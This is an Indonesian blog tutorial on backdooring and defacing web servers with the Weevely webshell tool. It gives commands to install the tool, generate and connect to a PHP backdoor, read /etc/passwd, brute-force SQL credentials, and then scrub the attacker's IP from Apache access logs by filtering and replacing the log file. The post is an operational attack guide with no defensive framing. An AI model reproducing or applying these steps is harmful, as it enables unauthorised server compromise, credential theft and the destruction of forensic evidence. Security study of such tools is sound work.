Wednesday, April 4, 2018

Home » » Cara Backdoor dan Deface Web Server Menggunakan Weevely

Cara Backdoor dan Deface Web Server Menggunakan Weevely

By  April 04, 2018  No comments
Weevely merupakan sebuah Webshell Management Tool yang ditulis menggunkakan bahasa pemrograman Phyton. Weevely hanya ini tersedia untuk sistem operasi Linux.

Bagaimana cara melakukan Backdoor dan Deface Web Server Menggunakan Weevely?

 Langsung saja ke langkah-langkahnya.

Instalasi
root@ddos:~# pip install prettytable Mako PyYAML python-dateutil PySocks –upgrade
root@ddos:~# apt-get install g++ python-pip libyaml-dev python-dev

Cara menjalankan Weevely

Backdoor dan Deface Web Server Menggunakan Weevely


 Membuat sebuah Backdoor
root@ddos:~# weevely generate ddos ddos.php 
*bd core ddos.php modules utils weevely.py


Koneksikan ke Backdoor

root@ddos:/usr/share/weevely# weevely http://192.168.1.8/ddos.php ddos
Backdoor dan Deface Web Server Menggunakan Weevely


Bypass Policy to Read /etc/passwd
www-data@ddos:/etc $ audit_etcpasswd
Backdoor dan Deface Web Server Menggunakan Weevely


 Menebak Credential SQL user
Langkah ini merupakan cara menebak kredensial dari beberapa pengguna SQL.
weevely> bruteforce_sql –help
Backdoor dan Deface Web Server Menggunakan Weevely


 Pembersihan log
Trik ini untuk adalah cara membersihkan catatan log pada server.

Backdoor dan Deface Web Server Menggunakan Weevely


Disini kita gunakan command system_info untuk mendapatkan Ip yang kita gunakan
www-data@ddos:/var/log $ system_info -info client_ip

Kita gunakan grep command untuk mengkonfirm bahwa Ip yang telah kita dapatkan berada dalam file Log
www-data@ddos:/var/log/apache2 $ cat ‘/var/log/apache2/access.log.1’ |grep “192.168.1.8”
Backdoor dan Deface Web Server Menggunakan Weevely

Kita akan melihat bahwa aktifitas Ip kita telah terecord atau terekam pada Log.
Disini kita akan menggunakan perintah Grep untuk menghapus Ip lalu menyimpannya ke file sementara / temporary file.
www-data@ddos:/var/log/apache2 $ cat ‘/var/log/apache2/access.log.1’ |grep -v “192.168.1.8” > cleaned.log

Silahkan uji apakah Ip telah berhasil kita hapus
www-data@ddos:/var/log/apache2 $ cat ‘/var/log/apache2/access.log.1’ |grep -v “192.168.1.8” > cleaned.log
www-data@ddos:/var/log/apache2 $ cat cleaned.log |grep “192.168.1.8”
www-data@ddos:/var/log/apache2 $ 

Lalu kita ganti file cleaned.log dengan access.log.1
www-data@ddos:/var/log/apache2 $ rm access.log.1
www-data@ddos:/var/log/apache2 $ mv cleaned.log access.log.1

0 comments:

Post a Comment